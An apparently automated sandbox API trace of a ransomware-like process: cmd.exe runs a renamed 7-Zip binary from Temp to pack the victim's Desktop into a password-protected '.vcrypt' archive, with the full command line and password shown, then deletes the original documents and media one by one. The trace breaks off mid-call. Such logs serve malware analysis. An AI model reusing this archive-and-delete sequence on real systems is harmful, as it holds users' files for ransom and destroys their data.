GetStartupInfoW (in: lpStartupInfo=0x3eec78 | out: lpStartupInfo=0x3eec78*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x7b1c30, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0057.329] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c4798 [0057.329] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.329] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.329] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.329] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0057.330] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.331] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.331] GetProcessHeap () returned 0x7b0000 [0057.331] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c4798 | out: hHeap=0x7b0000) returned 1 [0057.331] GetProcessHeap () returned 0x7b0000 [0057.331] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xa) returned 0x7c0338 [0057.331] lstrcmpW (lpString1="\\mod_01.exe", lpString2="\\XCOPY.EXE") returned -1 [0057.331] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe", lpCommandLine="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3eed18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3eed64 | out: lpCommandLine="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ", lpProcessInformation=0x3eed64*(hProcess=0x78, hThread=0x84, dwProcessId=0x888, dwThreadId=0x898)) returned 1 [0057.388] CloseHandle (hObject=0x84) returned 1 [0057.389] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0057.389] GetProcessHeap () returned 0x7b0000 [0057.389] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5ab0 | out: hHeap=0x7b0000) returned 1 [0057.389] GetEnvironmentStringsW () returned 0x7c5190* [0057.389] GetProcessHeap () returned 0x7b0000 [0057.389] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb36) returned 0x7c8b98 [0057.389] FreeEnvironmentStringsW (penv=0x7c5190) returned 1 [0057.389] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0063.958] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3eec58 | out: lpExitCode=0x3eec58*=0x0) returned 1 [0063.959] CloseHandle (hObject=0x78) returned 1 [0063.959] _vsnwprintf (in: _Buffer=0x3eeda0, _BufferCount=0x13, _Format="%08X", _ArgList=0x3eec64 | out: _Buffer="00000000") returned 8 [0063.959] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0063.959] GetProcessHeap () returned 0x7b0000 [0063.959] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c8b98 | out: hHeap=0x7b0000) returned 1 [0063.959] GetEnvironmentStringsW () returned 0x7c8b98* [0063.959] GetProcessHeap () returned 0x7b0000 [0063.959] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb5c) returned 0x7c9700 [0063.959] FreeEnvironmentStringsW (penv=0x7c8b98) returned 1 [0063.959] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0063.959] GetProcessHeap () returned 0x7b0000 [0063.959] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c9700 | out: hHeap=0x7b0000) returned 1 [0063.960] GetEnvironmentStringsW () returned 0x7c8b98* [0063.960] GetProcessHeap () returned 0x7b0000 [0063.960] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb5c) returned 0x7c9700 [0063.960] FreeEnvironmentStringsW (penv=0x7c8b98) returned 1 [0063.960] GetProcessHeap () returned 0x7b0000 [0063.960] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c0338 | out: hHeap=0x7b0000) returned 1 [0063.960] DeleteProcThreadAttributeList (in: lpAttributeList=0x3eecbc | out: lpAttributeList=0x3eecbc) [0063.960] GetConsoleTitleW (in: lpConsoleTitle=0x3ef03c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0063.960] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c5cf8, Size=0x74) returned 0x7c5cf8 [0063.960] GetProcessHeap () returned 0x7b0000 [0063.960] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c5cf8) returned 0x74 [0063.961] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c5d78, Size=0x74) returned 0x7c5d78 [0063.961] GetProcessHeap () returned 0x7b0000 [0063.961] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c5d78) returned 0x74 [0063.961] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3eedf4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.961] GetProcessHeap () returned 0x7b0000 [0063.961] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x38) returned 0x7bf7e8 [0063.961] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3ede84 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.961] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3ee0b4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x3ee0b8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3ee0b4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0063.962] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0063.962] GetProcessHeap () returned 0x7b0000 [0063.962] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x2c) returned 0x7c5e58 [0063.962] GetProcessHeap () returned 0x7b0000 [0063.962] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x258) returned 0x7c5e90 [0063.962] GetProcessHeap () returned 0x7b0000 [0063.962] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x5e) returned 0x7c60f0 [0063.962] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7c6160 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.962] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", nBufferLength=0x104, lpBuffer=0x3ee4d8, lpFilePart=0x3ee4c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFilePart=0x3ee4c0*="*") returned 0x27 [0063.962] SetErrorMode (uMode=0x0) returned 0x1 [0063.962] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0063.963] GetProcessHeap () returned 0x7b0000 [0063.963] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x258) returned 0x7c6370 [0063.963] _wcsicmp (_String1="*", _String2=".") returned -4 [0063.963] _wcsicmp (_String1="*", _String2="..") returned -4 [0063.963] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\*")) returned 0xffffffff [0063.963] GetLastError () returned 0x7b [0063.963] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", fInfoLevelId=0x0, lpFindFileData=0x7c26cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7c26cc) returned 0x7c2ed0 [0063.963] GetProcessHeap () returned 0x7b0000 [0063.963] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c4778, Size=0x4) returned 0x7c4778 [0063.963] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.965] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ca2c40, ftCreationTime.dwHighDateTime=0x1d5db7f, ftLastAccessTime.dwLowDateTime=0xe3634a00, ftLastAccessTime.dwHighDateTime=0x1d5d94a, ftLastWriteTime.dwLowDateTime=0xe3634a00, ftLastWriteTime.dwHighDateTime=0x1d5d94a, nFileSizeHigh=0x0, nFileSizeLow=0xfe40, dwReserved0=0x0, dwReserved1=0x0, cFileName="47Upt ff5iyL.avi", cAlternateFileName="47UPTF~1.AVI")) returned 1 [0063.965] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\47Upt ff5iyL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\47upt ff5iyl.avi")) returned 1 [0063.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.968] GetFileType (hFile=0x7) returned 0x2 [0063.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.969] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.969] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.971] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\47Upt ff5iyL.avi\r\n") returned 0x47 [0063.971] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x47) returned 1 [0063.972] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83122110, ftCreationTime.dwHighDateTime=0x1d5e577, ftLastAccessTime.dwLowDateTime=0xe28d7e90, ftLastAccessTime.dwHighDateTime=0x1d5dcdb, ftLastWriteTime.dwLowDateTime=0xe28d7e90, ftLastWriteTime.dwHighDateTime=0x1d5dcdb, nFileSizeHigh=0x0, nFileSizeLow=0x5853, dwReserved0=0x0, dwReserved1=0x0, cFileName="8v1Sb42C0-_SO.xls", cAlternateFileName="8V1SB4~1.XLS")) returned 1 [0063.972] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8v1Sb42C0-_SO.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8v1sb42c0-_so.xls")) returned 1 [0063.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.973] GetFileType (hFile=0x7) returned 0x2 [0063.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.974] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.974] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.974] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.975] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.975] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8v1Sb42C0-_SO.xls\r\n") returned 0x48 [0063.975] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x48) returned 1 [0063.976] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a2e450, ftCreationTime.dwHighDateTime=0x1d5e476, ftLastAccessTime.dwLowDateTime=0x776a9c0, ftLastAccessTime.dwHighDateTime=0x1d5e3e9, ftLastWriteTime.dwLowDateTime=0x776a9c0, ftLastWriteTime.dwHighDateTime=0x1d5e3e9, nFileSizeHigh=0x0, nFileSizeLow=0x17daa, dwReserved0=0x0, dwReserved1=0x0, cFileName="8ZRp Yo.mp4", cAlternateFileName="8ZRPYO~1.MP4")) returned 1 [0063.976] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ZRp Yo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8zrp yo.mp4")) returned 1 [0063.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.976] GetFileType (hFile=0x7) returned 0x2 [0063.977] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.977] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.977] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.977] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.977] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.977] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ZRp Yo.mp4\r\n") returned 0x42 [0063.978] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x42, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x42) returned 1 [0063.978] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb086900, ftCreationTime.dwHighDateTime=0x1d5e2bd, ftLastAccessTime.dwLowDateTime=0xee4cc050, ftLastAccessTime.dwHighDateTime=0x1d5d9d0, ftLastWriteTime.dwLowDateTime=0xee4cc050, ftLastWriteTime.dwHighDateTime=0x1d5d9d0, nFileSizeHigh=0x0, nFileSizeLow=0x1676d, dwReserved0=0x0, dwReserved1=0x0, cFileName="buFx.bmp", cAlternateFileName="")) returned 1 [0063.978] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\buFx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bufx.bmp")) returned 1 [0063.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.979] GetFileType (hFile=0x7) returned 0x2 [0063.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.980] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.980] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\buFx.bmp\r\n") returned 0x3f [0063.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x3f) returned 1 [0063.981] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0063.981] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f137d0, ftCreationTime.dwHighDateTime=0x1d5d7ac, ftLastAccessTime.dwLowDateTime=0x7d8ac310, ftLastAccessTime.dwHighDateTime=0x1d5de55, ftLastWriteTime.dwLowDateTime=0x7d8ac310, ftLastWriteTime.dwHighDateTime=0x1d5de55, nFileSizeHigh=0x0, nFileSizeLow=0xf08c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJg6m_dnHXJPIeQU.pps", cAlternateFileName="FJG6M_~1.PPS")) returned 1 [0063.981] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJg6m_dnHXJPIeQU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fjg6m_dnhxjpiequ.pps")) returned 1 [0063.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.982] GetFileType (hFile=0x7) returned 0x2 [0063.983] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.983] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.984] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.984] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJg6m_dnHXJPIeQU.pps\r\n") returned 0x4b [0063.984] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4b) returned 1 [0063.985] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a87d0, ftCreationTime.dwHighDateTime=0x1d5e21c, ftLastAccessTime.dwLowDateTime=0x431e1b90, ftLastAccessTime.dwHighDateTime=0x1d5ded3, ftLastWriteTime.dwLowDateTime=0x431e1b90, ftLastWriteTime.dwHighDateTime=0x1d5ded3, nFileSizeHigh=0x0, nFileSizeLow=0x59e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hjb-m4EYHMa7GTDEF.doc", cAlternateFileName="HJB-M4~1.DOC")) returned 1 [0063.985] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hjb-m4EYHMa7GTDEF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hjb-m4eyhma7gtdef.doc")) returned 1 [0063.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.986] GetFileType (hFile=0x7) returned 0x2 [0063.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0063.987] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0063.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.987] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0063.988] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0063.988] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hjb-m4EYHMa7GTDEF.doc\r\n") returned 0x4c [0063.988] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4c) returned 1 [0063.989] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6da07d0, ftCreationTime.dwHighDateTime=0x1d5dd48, ftLastAccessTime.dwLowDateTime=0x8c1eec50, ftLastAccessTime.dwHighDateTime=0x1d5d9c1, ftLastWriteTime.dwLowDateTime=0x8c1eec50, 